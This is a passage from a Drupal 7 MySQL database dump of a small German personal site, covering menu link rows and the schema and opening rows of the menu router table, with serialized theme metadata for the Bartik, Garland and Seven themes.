alias','a:0:{}','system',0,0,0,0,0,5,0,1,8,53,202,211,0,0,0,0,0),('management',212,206,'admin/config/user-interface/shortcut/%/edit','admin/config/user-interface/shortcut/%/edit','Edit set name','a:0:{}','system',-1,0,0,0,10,6,0,1,8,61,201,206,212,0,0,0,0),('management',213,201,'admin/config/user-interface/shortcut/link/%','admin/config/user-interface/shortcut/link/%','Edit shortcut','a:0:{}','system',0,0,1,0,0,5,0,1,8,61,201,213,0,0,0,0,0),('management',214,206,'admin/config/user-interface/shortcut/%/links','admin/config/user-interface/shortcut/%/links','List links','a:0:{}','system',-1,0,0,0,0,6,0,1,8,61,201,206,214,0,0,0,0),('management',215,213,'admin/config/user-interface/shortcut/link/%/delete','admin/config/user-interface/shortcut/link/%/delete','Delete shortcut','a:0:{}','system',0,0,0,0,0,6,0,1,8,61,201,213,215,0,0,0,0),('shortcut-set-1',216,0,'node/add','node/add','Add content','a:0:{}','menu',0,0,0,0,-50,1,0,216,0,0,0,0,0,0,0,0,0),('shortcut-set-1',217,0,'admin/content','admin/content','Find content','a:0:{}','menu',0,0,0,0,-49,1,0,217,0,0,0,0,0,0,0,0,0),('main-menu',218,0,'','','Home','a:0:{}','menu',0,1,0,0,-50,1,1,218,0,0,0,0,0,0,0,0,0),('navigation',219,6,'node/add/article','node/add/article','Article','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:89:\"Use articles for time-sensitive content like news, press releases or blog posts.\";}}','system',0,0,0,0,0,2,0,6,219,0,0,0,0,0,0,0,0),('navigation',220,6,'node/add/page','node/add/page','Basic page','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:77:\"Use basic pages for your static content, such as an \'About us\' page.\";}}','system',0,0,0,0,0,2,0,6,220,0,0,0,0,0,0,0,0),('management',221,12,'admin/help/toolbar','admin/help/toolbar','toolbar','a:0:{}','system',-1,0,0,0,0,3,0,1,12,221,0,0,0,0,0,0,0),('management',260,19,'admin/reports/updates','admin/reports/updates','Available updates','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:82:\"Get a status report about available updates for your installed modules and themes.\";}}','system',0,0,0,0,-50,3,0,1,19,260,0,0,0,0,0,0,0),('management',261,7,'admin/appearance/install','admin/appearance/install','Install new theme','a:0:{}','system',-1,0,0,0,25,3,0,1,7,261,0,0,0,0,0,0,0),('management',262,16,'admin/modules/update','admin/modules/update','Update','a:0:{}','system',-1,0,0,0,10,3,0,1,16,262,0,0,0,0,0,0,0),('management',263,16,'admin/modules/install','admin/modules/install','Install new module','a:0:{}','system',-1,0,0,0,25,3,0,1,16,263,0,0,0,0,0,0,0),('management',264,7,'admin/appearance/update','admin/appearance/update','Update','a:0:{}','system',-1,0,0,0,10,3,0,1,7,264,0,0,0,0,0,0,0),('management',265,12,'admin/help/update','admin/help/update','update','a:0:{}','system',-1,0,0,0,0,3,0,1,12,265,0,0,0,0,0,0,0),('management',266,260,'admin/reports/updates/install','admin/reports/updates/install','Install new module or theme','a:0:{}','system',-1,0,0,0,25,4,0,1,19,260,266,0,0,0,0,0,0),('management',267,260,'admin/reports/updates/update','admin/reports/updates/update','Update','a:0:{}','system',-1,0,0,0,10,4,0,1,19,260,267,0,0,0,0,0,0),('management',268,260,'admin/reports/updates/list','admin/reports/updates/list','List','a:0:{}','system',-1,0,0,0,0,4,0,1,19,260,268,0,0,0,0,0,0),('management',269,260,'admin/reports/updates/settings','admin/reports/updates/settings','Settings','a:0:{}','system',-1,0,0,0,50,4,0,1,19,260,269,0,0,0,0,0,0),('shortcut-set-1',308,0,'node/add/article','node/add/article','Article','a:0:{}','menu',0,0,0,0,-48,1,0,308,0,0,0,0,0,0,0,0,0),('main-menu',310,0,'http://www.ollital.de/wordpress','','Blog','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:11:\"Mein Weblog\";}}','menu',0,1,0,0,-48,1,1,310,0,0,0,0,0,0,0,0,0),('main-menu',311,0,'node/5','node/%','Termine','a:0:{}','menu',0,0,0,0,0,1,0,311,0,0,0,0,0,0,0,0,0),('management',312,89,'admin/structure/taxonomy/%/display','admin/structure/taxonomy/%/display','Manage display','a:0:{}','system',-1,0,0,0,2,5,0,1,21,57,89,312,0,0,0,0,0),('management',313,90,'admin/config/people/accounts/display','admin/config/people/accounts/display','Manage display','a:0:{}','system',-1,0,0,0,2,5,0,1,8,48,90,313,0,0,0,0,0),('management',314,89,'admin/structure/taxonomy/%/fields','admin/structure/taxonomy/%/fields','Manage fields','a:0:{}','system',-1,0,1,0,1,5,0,1,21,57,89,314,0,0,0,0,0),('management',315,90,'admin/config/people/accounts/fields','admin/config/people/accounts/fields','Manage fields','a:0:{}','system',-1,0,1,0,1,5,0,1,8,48,90,315,0,0,0,0,0),('management',316,312,'admin/structure/taxonomy/%/display/default','admin/structure/taxonomy/%/display/default','Default','a:0:{}','system',-1,0,0,0,-10,6,0,1,21,57,89,312,316,0,0,0,0),('management',317,313,'admin/config/people/accounts/display/default','admin/config/people/accounts/display/default','Default','a:0:{}','system',-1,0,0,0,-10,6,0,1,8,48,90,313,317,0,0,0,0),('management',318,135,'admin/structure/types/manage/%/display','admin/structure/types/manage/%/display','Manage display','a:0:{}','system',-1,0,0,0,2,5,0,1,21,36,135,318,0,0,0,0,0),('management',319,135,'admin/structure/types/manage/%/fields','admin/structure/types/manage/%/fields','Manage fields','a:0:{}','system',-1,0,1,0,1,5,0,1,21,36,135,319,0,0,0,0,0),('management',320,312,'admin/structure/taxonomy/%/display/full','admin/structure/taxonomy/%/display/full','Taxonomy term page','a:0:{}','system',-1,0,0,0,0,6,0,1,21,57,89,312,320,0,0,0,0),('management',321,313,'admin/config/people/accounts/display/full','admin/config/people/accounts/display/full','User account','a:0:{}','system',-1,0,0,0,0,6,0,1,8,48,90,313,321,0,0,0,0),('management',322,314,'admin/structure/taxonomy/%/fields/%','admin/structure/taxonomy/%/fields/%','','a:0:{}','system',0,0,0,0,0,6,0,1,21,57,89,314,322,0,0,0,0),('management',323,315,'admin/config/people/accounts/fields/%','admin/config/people/accounts/fields/%','','a:0:{}','system',0,0,0,0,0,6,0,1,8,48,90,315,323,0,0,0,0),('management',324,318,'admin/structure/types/manage/%/display/default','admin/structure/types/manage/%/display/default','Default','a:0:{}','system',-1,0,0,0,-10,6,0,1,21,36,135,318,324,0,0,0,0),('management',325,318,'admin/structure/types/manage/%/display/full','admin/structure/types/manage/%/display/full','Full content','a:0:{}','system',-1,0,0,0,0,6,0,1,21,36,135,318,325,0,0,0,0),('management',326,318,'admin/structure/types/manage/%/display/rss','admin/structure/types/manage/%/display/rss','RSS','a:0:{}','system',-1,0,0,0,2,6,0,1,21,36,135,318,326,0,0,0,0),('management',327,318,'admin/structure/types/manage/%/display/search_index','admin/structure/types/manage/%/display/search_index','Search index','a:0:{}','system',-1,0,0,0,3,6,0,1,21,36,135,318,327,0,0,0,0),('management',328,318,'admin/structure/types/manage/%/display/search_result','admin/structure/types/manage/%/display/search_result','Search result highlighting input','a:0:{}','system',-1,0,0,0,4,6,0,1,21,36,135,318,328,0,0,0,0),('management',329,318,'admin/structure/types/manage/%/display/teaser','admin/structure/types/manage/%/display/teaser','Teaser','a:0:{}','system',-1,0,0,0,1,6,0,1,21,36,135,318,329,0,0,0,0),('management',330,319,'admin/structure/types/manage/%/fields/%','admin/structure/types/manage/%/fields/%','','a:0:{}','system',0,0,0,0,0,6,0,1,21,36,135,319,330,0,0,0,0),('management',331,322,'admin/structure/taxonomy/%/fields/%/delete','admin/structure/taxonomy/%/fields/%/delete','Delete','a:0:{}','system',-1,0,0,0,10,7,0,1,21,57,89,314,322,331,0,0,0),('management',332,322,'admin/structure/taxonomy/%/fields/%/edit','admin/structure/taxonomy/%/fields/%/edit','Edit','a:0:{}','system',-1,0,0,0,0,7,0,1,21,57,89,314,322,332,0,0,0),('management',333,322,'admin/structure/taxonomy/%/fields/%/field-settings','admin/structure/taxonomy/%/fields/%/field-settings','Field settings','a:0:{}','system',-1,0,0,0,0,7,0,1,21,57,89,314,322,333,0,0,0),('management',334,322,'admin/structure/taxonomy/%/fields/%/widget-type','admin/structure/taxonomy/%/fields/%/widget-type','Widget type','a:0:{}','system',-1,0,0,0,0,7,0,1,21,57,89,314,322,334,0,0,0),('management',335,323,'admin/config/people/accounts/fields/%/delete','admin/config/people/accounts/fields/%/delete','Delete','a:0:{}','system',-1,0,0,0,10,7,0,1,8,48,90,315,323,335,0,0,0),('management',336,323,'admin/config/people/accounts/fields/%/edit','admin/config/people/accounts/fields/%/edit','Edit','a:0:{}','system',-1,0,0,0,0,7,0,1,8,48,90,315,323,336,0,0,0),('management',337,323,'admin/config/people/accounts/fields/%/field-settings','admin/config/people/accounts/fields/%/field-settings','Field settings','a:0:{}','system',-1,0,0,0,0,7,0,1,8,48,90,315,323,337,0,0,0),('management',338,323,'admin/config/people/accounts/fields/%/widget-type','admin/config/people/accounts/fields/%/widget-type','Widget type','a:0:{}','system',-1,0,0,0,0,7,0,1,8,48,90,315,323,338,0,0,0),('management',339,173,'admin/structure/types/manage/%/comment/display/default','admin/structure/types/manage/%/comment/display/default','Default','a:0:{}','system',-1,0,0,0,-10,6,0,1,21,36,135,173,339,0,0,0,0),('management',340,173,'admin/structure/types/manage/%/comment/display/full','admin/structure/types/manage/%/comment/display/full','Full comment','a:0:{}','system',-1,0,0,0,0,6,0,1,21,36,135,173,340,0,0,0,0),('management',341,330,'admin/structure/types/manage/%/fields/%/delete','admin/structure/types/manage/%/fields/%/delete','Delete','a:0:{}','system',-1,0,0,0,10,7,0,1,21,36,135,319,330,341,0,0,0),('management',342,174,'admin/structure/types/manage/%/comment/fields/%','admin/structure/types/manage/%/comment/fields/%','','a:0:{}','system',0,0,0,0,0,6,0,1,21,36,135,174,342,0,0,0,0),('management',343,330,'admin/structure/types/manage/%/fields/%/edit','admin/structure/types/manage/%/fields/%/edit','Edit','a:0:{}','system',-1,0,0,0,0,7,0,1,21,36,135,319,330,343,0,0,0),('management',344,330,'admin/structure/types/manage/%/fields/%/field-settings','admin/structure/types/manage/%/fields/%/field-settings','Field settings','a:0:{}','system',-1,0,0,0,0,7,0,1,21,36,135,319,330,344,0,0,0),('management',345,330,'admin/structure/types/manage/%/fields/%/widget-type','admin/structure/types/manage/%/fields/%/widget-type','Widget type','a:0:{}','system',-1,0,0,0,0,7,0,1,21,36,135,319,330,345,0,0,0),('management',346,342,'admin/structure/types/manage/%/comment/fields/%/delete','admin/structure/types/manage/%/comment/fields/%/delete','Delete','a:0:{}','system',-1,0,0,0,10,7,0,1,21,36,135,174,342,346,0,0,0),('management',347,342,'admin/structure/types/manage/%/comment/fields/%/edit','admin/structure/types/manage/%/comment/fields/%/edit','Edit','a:0:{}','system',-1,0,0,0,0,7,0,1,21,36,135,174,342,347,0,0,0),('management',348,342,'admin/structure/types/manage/%/comment/fields/%/field-settings','admin/structure/types/manage/%/comment/fields/%/field-settings','Field settings','a:0:{}','system',-1,0,0,0,0,7,0,1,21,36,135,174,342,348,0,0,0),('management',349,342,'admin/structure/types/manage/%/comment/fields/%/widget-type','admin/structure/types/manage/%/comment/fields/%/widget-type','Widget type','a:0:{}','system',-1,0,0,0,0,7,0,1,21,36,135,174,342,349,0,0,0),('main-menu',350,0,'node/6','node/%','Mitgliedschaften','a:0:{}','menu',0,0,0,0,0,1,0,350,0,0,0,0,0,0,0,0,0),('main-menu',351,0,'https://wiki.piratenpartei.de/Benutzer:Darkwing','','Pirat','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:0:\"\";}}','menu',0,1,0,0,0,1,1,351,0,0,0,0,0,0,0,0,0),('management',352,19,'admin/reports/hits','admin/reports/hits','Recent hits','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:43:\"View pages that have recently been visited.\";}}','system',0,0,0,0,0,3,0,1,19,352,0,0,0,0,0,0,0),('management',353,19,'admin/reports/pages','admin/reports/pages','Top pages','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:41:\"View pages that have been hit frequently.\";}}','system',0,0,0,0,1,3,0,1,19,353,0,0,0,0,0,0,0),('management',354,19,'admin/reports/referrers','admin/reports/referrers','Top referrers','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:19:\"View top referrers.\";}}','system',0,0,0,0,0,3,0,1,19,354,0,0,0,0,0,0,0),('management',355,19,'admin/reports/visitors','admin/reports/visitors','Top visitors','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View visitors that hit many pages.\";}}','system',0,0,0,0,2,3,0,1,19,355,0,0,0,0,0,0,0),('navigation',356,5,'node/%/track','node/%/track','Track','a:0:{}','system',-1,0,0,0,2,2,0,5,356,0,0,0,0,0,0,0,0),('management',357,12,'admin/help/statistics','admin/help/statistics','statistics','a:0:{}','system',-1,0,0,0,0,3,0,1,12,357,0,0,0,0,0,0,0),('management',358,19,'admin/reports/access/%','admin/reports/access/%','Details','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:16:\"View access log.\";}}','system',0,0,0,0,0,3,0,1,19,358,0,0,0,0,0,0,0),('management',359,56,'admin/config/system/statistics','admin/config/system/statistics','Statistics','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:68:\"Control details about what and how your site logs access statistics.\";}}','system',0,0,0,0,-15,4,0,1,8,56,359,0,0,0,0,0,0),('navigation',360,17,'user/%/track/navigation','user/%/track/navigation','Track page visits','a:0:{}','system',-1,0,0,0,2,2,0,17,360,0,0,0,0,0,0,0,0),('navigation',361,0,'contact','contact','Contact','a:0:{}','system',1,0,0,0,0,1,0,361,0,0,0,0,0,0,0,0,0),('navigation',362,17,'user/%/contact','user/%/contact','Contact','a:0:{}','system',-1,0,0,0,2,2,0,17,362,0,0,0,0,0,0,0,0),('management',363,21,'admin/structure/contact','admin/structure/contact','Contact form','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:71:\"Create a system contact form and set up categories for the form to use.\";}}','system',0,0,1,0,0,3,0,1,21,363,0,0,0,0,0,0,0),('management',364,12,'admin/help/contact','admin/help/contact','contact','a:0:{}','system',-1,0,0,0,0,3,0,1,12,364,0,0,0,0,0,0,0),('management',365,363,'admin/structure/contact/add','admin/structure/contact/add','Add category','a:0:{}','system',-1,0,0,0,1,4,0,1,21,363,365,0,0,0,0,0,0),('management',366,363,'admin/structure/contact/delete/%','admin/structure/contact/delete/%','Delete contact','a:0:{}','system',0,0,0,0,0,4,0,1,21,363,366,0,0,0,0,0,0),('management',367,363,'admin/structure/contact/edit/%','admin/structure/contact/edit/%','Edit contact category','a:0:{}','system',0,0,0,0,0,4,0,1,21,363,367,0,0,0,0,0,0); /*!40000 ALTER TABLE `dpl_menu_links` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_menu_router` -- DROP TABLE IF EXISTS `dpl_menu_router`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_menu_router` ( `path` varchar(255) NOT NULL DEFAULT '' COMMENT 'Primary Key: the Drupal path this entry describes', `load_functions` blob NOT NULL COMMENT 'A serialized array of function names (like node_load) to be called to load an object corresponding to a part of the current path.', `to_arg_functions` blob NOT NULL COMMENT 'A serialized array of function names (like user_uid_optional_to_arg) to be called to replace a part of the router path with another string.', `access_callback` varchar(255) NOT NULL DEFAULT '' COMMENT 'The callback which determines the access to this router path. Defaults to user_access.', `access_arguments` blob COMMENT 'A serialized array of arguments for the access callback.', `page_callback` varchar(255) NOT NULL DEFAULT '' COMMENT 'The name of the function that renders the page.', `page_arguments` blob COMMENT 'A serialized array of arguments for the page callback.', `delivery_callback` varchar(255) NOT NULL DEFAULT '' COMMENT 'The name of the function that sends the result of the page_callback function to the browser.', `fit` int(11) NOT NULL DEFAULT '0' COMMENT 'A numeric representation of how specific the path is.', `number_parts` smallint(6) NOT NULL DEFAULT '0' COMMENT 'Number of parts in this router path.', `context` int(11) NOT NULL DEFAULT '0' COMMENT 'Only for local tasks (tabs) - the context of a local task to control its placement.', `tab_parent` varchar(255) NOT NULL DEFAULT '' COMMENT 'Only for local tasks (tabs) - the router path of the parent page (which may also be a local task).', `tab_root` varchar(255) NOT NULL DEFAULT '' COMMENT 'Router path of the closest non-tab parent page. For pages that are not local tasks, this will be the same as the path.', `title` varchar(255) NOT NULL DEFAULT '' COMMENT 'The title for the current page, or the title for the tab if this is a local task.', `title_callback` varchar(255) NOT NULL DEFAULT '' COMMENT 'A function which will alter the title. Defaults to t()', `title_arguments` varchar(255) NOT NULL DEFAULT '' COMMENT 'A serialized array of arguments for the title callback. If empty, the title will be used as the sole argument for the title callback.', `theme_callback` varchar(255) NOT NULL DEFAULT '' COMMENT 'A function which returns the name of the theme that will be used to render this page. If left empty, the default theme will be used.', `theme_arguments` varchar(255) NOT NULL DEFAULT '' COMMENT 'A serialized array of arguments for the theme callback.', `type` int(11) NOT NULL DEFAULT '0' COMMENT 'Numeric representation of the type of the menu item, like MENU_LOCAL_TASK.', `description` text NOT NULL COMMENT 'A description of this item.', `position` varchar(255) NOT NULL DEFAULT '' COMMENT 'The position of the block (left or right) on the system administration page for this item.', `weight` int(11) NOT NULL DEFAULT '0' COMMENT 'Weight of the element. Lighter weights are higher up, heavier weights go down.', `include_file` mediumtext COMMENT 'The file to include for this element, usually the page callback function lives in this file.', PRIMARY KEY (`path`), KEY `fit` (`fit`), KEY `tab_parent` (`tab_parent`(64),`weight`,`title`), KEY `tab_root_weight_title` (`tab_root`(64),`weight`,`title`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Maps paths to various callbacks (access, page and title)'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_menu_router` -- LOCK TABLES `dpl_menu_router` WRITE; /*!40000 ALTER TABLE `dpl_menu_router` DISABLE KEYS */; INSERT INTO `dpl_menu_router` VALUES ('admin','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','system_admin_menu_block_page','a:0:{}','',1,1,0,'','admin','Administration','t','','','a:0:{}',6,'','',9,'modules/system/system.admin.inc'),('admin/appearance','','','user_access','a:1:{i:0;s:17:\"administer themes\";}','system_themes_page','a:0:{}','',3,2,0,'','admin/appearance','Appearance','t','','','a:0:{}',6,'Select and configure your themes.','left',-6,'modules/system/system.admin.inc'),('admin/appearance/default','','','user_access','a:1:{i:0;s:17:\"administer themes\";}','system_theme_default','a:0:{}','',7,3,0,'','admin/appearance/default','Set default theme','t','','','a:0:{}',0,'','',0,'modules/system/system.admin.inc'),('admin/appearance/disable','','','user_access','a:1:{i:0;s:17:\"administer themes\";}','system_theme_disable','a:0:{}','',7,3,0,'','admin/appearance/disable','Disable theme','t','','','a:0:{}',0,'','',0,'modules/system/system.admin.inc'),('admin/appearance/enable','','','user_access','a:1:{i:0;s:17:\"administer themes\";}','system_theme_enable','a:0:{}','',7,3,0,'','admin/appearance/enable','Enable theme','t','','','a:0:{}',0,'','',0,'modules/system/system.admin.inc'),('admin/appearance/install','','','update_manager_access','a:0:{}','drupal_get_form','a:2:{i:0;s:27:\"update_manager_install_form\";i:1;s:5:\"theme\";}','',7,3,1,'admin/appearance','admin/appearance','Install new theme','t','','','a:0:{}',388,'','',25,'modules/update/update.manager.inc'),('admin/appearance/list','','','user_access','a:1:{i:0;s:17:\"administer themes\";}','system_themes_page','a:0:{}','',7,3,1,'admin/appearance','admin/appearance','List','t','','','a:0:{}',140,'Select and configure your theme','',-1,'modules/system/system.admin.inc'),('admin/appearance/settings','','','user_access','a:1:{i:0;s:17:\"administer themes\";}','drupal_get_form','a:1:{i:0;s:21:\"system_theme_settings\";}','',7,3,1,'admin/appearance','admin/appearance','Settings','t','','','a:0:{}',132,'Configure default and theme specific settings.','',20,'modules/system/system.admin.inc'),('admin/appearance/settings/bartik','','','_system_themes_access','a:1:{i:0;O:8:\"stdClass\":12:{s:8:\"filename\";s:25:\"themes/bartik/bartik.info\";s:4:\"name\";s:6:\"bartik\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:19:{s:4:\"name\";s:6:\"Bartik\";s:11:\"description\";s:48:\"A flexible, recolorable theme with many regions.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:3:{s:14:\"css/layout.css\";s:28:\"themes/bartik/css/layout.css\";s:13:\"css/style.css\";s:27:\"themes/bartik/css/style.css\";s:14:\"css/colors.css\";s:28:\"themes/bartik/css/colors.css\";}s:5:\"print\";a:1:{s:13:\"css/print.css\";s:27:\"themes/bartik/css/print.css\";}}s:7:\"regions\";a:20:{s:6:\"header\";s:6:\"Header\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:11:\"highlighted\";s:11:\"Highlighted\";s:8:\"featured\";s:8:\"Featured\";s:7:\"content\";s:7:\"Content\";s:13:\"sidebar_first\";s:13:\"Sidebar first\";s:14:\"sidebar_second\";s:14:\"Sidebar second\";s:14:\"triptych_first\";s:14:\"Triptych first\";s:15:\"triptych_middle\";s:15:\"Triptych middle\";s:13:\"triptych_last\";s:13:\"Triptych last\";s:18:\"footer_firstcolumn\";s:19:\"Footer first column\";s:19:\"footer_secondcolumn\";s:20:\"Footer second column\";s:18:\"footer_thirdcolumn\";s:19:\"Footer third column\";s:19:\"footer_fourthcolumn\";s:20:\"Footer fourth column\";s:6:\"footer\";s:6:\"Footer\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"settings\";a:1:{s:20:\"shortcut_module_link\";s:1:\"0\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:6:\"engine\";s:11:\"phptemplate\";s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:28:\"themes/bartik/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1416429488;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:3:{s:14:\"css/layout.css\";s:28:\"themes/bartik/css/layout.css\";s:13:\"css/style.css\";s:27:\"themes/bartik/css/style.css\";s:14:\"css/colors.css\";s:28:\"themes/bartik/css/colors.css\";}s:5:\"print\";a:1:{s:13:\"css/print.css\";s:27:\"themes/bartik/css/print.css\";}}s:6:\"engine\";s:11:\"phptemplate\";}}','drupal_get_form','a:2:{i:0;s:21:\"system_theme_settings\";i:1;s:6:\"bartik\";}','',15,4,1,'admin/appearance/settings','admin/appearance','Bartik','t','','','a:0:{}',132,'','',0,'modules/system/system.admin.inc'),('admin/appearance/settings/garland','','','_system_themes_access','a:1:{i:0;O:8:\"stdClass\":12:{s:8:\"filename\";s:27:\"themes/garland/garland.info\";s:4:\"name\";s:7:\"garland\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"0\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:19:{s:4:\"name\";s:7:\"Garland\";s:11:\"description\";s:111:\"A multi-column theme which can be configured to modify colors and switch between fixed and fluid width layouts.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:1:{s:9:\"style.css\";s:24:\"themes/garland/style.css\";}s:5:\"print\";a:1:{s:9:\"print.css\";s:24:\"themes/garland/print.css\";}}s:8:\"settings\";a:1:{s:13:\"garland_width\";s:5:\"fluid\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:6:\"engine\";s:11:\"phptemplate\";s:7:\"regions\";a:12:{s:13:\"sidebar_first\";s:12:\"Left sidebar\";s:14:\"sidebar_second\";s:13:\"Right sidebar\";s:7:\"content\";s:7:\"Content\";s:6:\"header\";s:6:\"Header\";s:6:\"footer\";s:6:\"Footer\";s:11:\"highlighted\";s:11:\"Highlighted\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:29:\"themes/garland/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1416429488;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:1:{s:9:\"style.css\";s:24:\"themes/garland/style.css\";}s:5:\"print\";a:1:{s:9:\"print.css\";s:24:\"themes/garland/print.css\";}}s:6:\"engine\";s:11:\"phptemplate\";}}','drupal_get_form','a:2:{i:0;s:21:\"system_theme_settings\";i:1;s:7:\"garland\";}','',15,4,1,'admin/appearance/settings','admin/appearance','Garland','t','','','a:0:{}',132,'','',0,'modules/system/system.admin.inc'),('admin/appearance/settings/global','','','user_access','a:1:{i:0;s:17:\"administer themes\";}','drupal_get_form','a:1:{i:0;s:21:\"system_theme_settings\";}','',15,4,1,'admin/appearance/settings','admin/appearance','Global settings','t','','','a:0:{}',140,'','',-1,'modules/system/system.admin.inc'),('admin/appearance/settings/seven','','','_system_themes_access','a:1:{i:0;O:8:\"stdClass\":12:{s:8:\"filename\";s:23:\"themes/seven/seven.info\";s:4:\"name\";s:5:\"seven\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:19:{s:4:\"name\";s:5:\"Seven\";s:11:\"description\";s:65:\"A simple one-column, tableless, fluid width administration theme.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:1:{s:6:\"screen\";a:2:{s:9:\"reset.css\";s:22:\"themes/seven/reset.css\";s:9:\"style.css\";s:22:\"themes/seven/style.css\";}}s:8:\"settings\";a:1:{s:20:\"shortcut_module_link\";s:1:\"1\";}s:7:\"regions\";a:8:{s:7:\"content\";s:7:\"Content\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:13:\"sidebar_first\";s:13:\"First sidebar\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard 